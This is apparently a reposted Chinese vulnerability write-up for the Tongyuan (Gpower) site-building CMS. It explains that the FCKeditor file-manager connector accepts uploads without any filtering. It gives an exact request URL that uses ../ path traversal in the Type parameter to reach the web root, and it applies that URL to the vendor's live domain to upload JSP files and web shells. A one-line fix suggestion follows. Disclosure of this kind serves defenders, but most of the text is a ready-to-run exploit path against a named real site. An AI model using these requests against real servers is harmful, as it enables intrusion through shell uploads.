来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 通元建站系统存在上传漏洞,可直接上传任意文件,无过滤。通元建站系统的网站均存在上传点访问www.xxx.com/cms/editor/filemanager/browser/default/browser.html?Type=Connector=connectors/jsp/connectorType.....
通元建站系统存在上传漏洞,可直接上传任意文件,无过滤。
通元建站系统的网站均存在上传点
访问
www.xxx.com/cms/editor/filemanager/browser/default/browser.html?Type=&Connector=connectors/jsp/connector
Type处可以 用../../等遍历文件夹 但是不能直接上传shell
需要构造从根目录到网站存放路径才可上传文件。
若要上传jsp文件要到网站根目录上一级中的cms文件下,可上传jsp文件,无过滤
如通元官网: www.2cto.com
http://www.gpowersoft.com/cms/editor/filemanager/browser/default/browser.html?Type=../../../../Tomcat5.5_Gpower/webapps/cms&Connector=connectors/jsp/connector
可上传Jsp文件。
图片不知道为什么上传不了。。。
这是本人在官网的测试
http://www.gpowersoft.com/index.txt
修复方案:
应该修改editor存放路径,删除上传点或上传增设过滤。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com